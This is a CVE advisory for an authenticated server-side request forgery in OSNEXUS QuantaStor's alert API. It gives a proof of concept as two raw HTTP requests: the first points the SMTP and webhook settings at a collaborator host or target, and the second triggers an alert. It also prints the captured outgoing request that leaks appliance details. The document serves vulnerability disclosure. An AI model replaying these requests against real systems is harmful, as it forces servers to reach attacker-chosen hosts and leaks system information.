CVE-2021-42079
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N
Summary
An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.
POC
Step 1: Prepare the SSRF with a request like this:
GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1
Host: <HOSTNAME> Accept-Encoding: gzip, deflate
Accept: / Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json
Content-Length: 0
Step 2: Trigger this alert with this request
GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: <HOSTNAME> Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json
Content-Length: 1
The post request received by <TARGET> looks like this: {
Python FLASK stuff
'endpoint': 'index', 'method': 'POST', 'cookies': ImmutableMultiDict([]),
END Python FLASK stuff
'data': b'{ "attachments": [ {
"fallback": "[122] test / test.",
"color": "#aa2222",
"title": "[122] test",
"text": "test",
"fields": [ {
"title": "Alert Severity", "value": "CRITICAL", "short": false }, { "title": "Appliance", "value": "quantastor (https://<HOSTNAME>)", "short": true
}, {
"title": "System / Driver / Kernel Ver",
"value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
"short": false
}, {
"title": "System Startup",
"value": "Fri Aug 6 16-02-55 2021",
"short": true
}, {
"title": "SSID",
"value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
"short": true
}, ],
"footer": "QuantaStor Call-home Alert",
"footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
"ts": 1628461774 } ], "mrkdwn":true }', #### FLASK REQUEST STUFF #####
'headers': {
'Host': '<redacted>', 'User-Agent': 'curl/7.58.0', 'Accept': '/', 'Content-Type': 'application/json', 'Content-Length': '790'
}, 'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' }
END FLASK REQUEST STUFF
Affected Software
| Vendor | Product | Version Range | Status |
|---|---|---|---|
| OSNEXUS | QuantaStor | 0 < 6.0.0.355 | affected |
Weaknesses
- CWE-918: CWE-918 Server-Side Request Forgery (SSRF)
ADP Enrichment
CVE Program Container
Additional References
- https://www.wbsec.nl/osnexus
- https://www.divd.nl/DIVD-2021-00020
- https://www.osnexus.com/products/software-defined-storage
- https://csirt.divd.nl/CVE-2021-42079
CISA ADP Vulnrichment
- SSVC:
- Exploitation: none
- Automatable: no
- Technical Impact: partial
References
- https://www.wbsec.nl/osnexus
- https://cisrt.divd.nl/DIVD-2021-00020/
- https://www.osnexus.com/products/software-defined-storage
- https://csirt.divd.nl/CVE-2021-42079
Feedback
Was this page helpful?
Glad to hear it! Please tell us how we can improve.
Sorry to hear that. Please tell us how we can improve.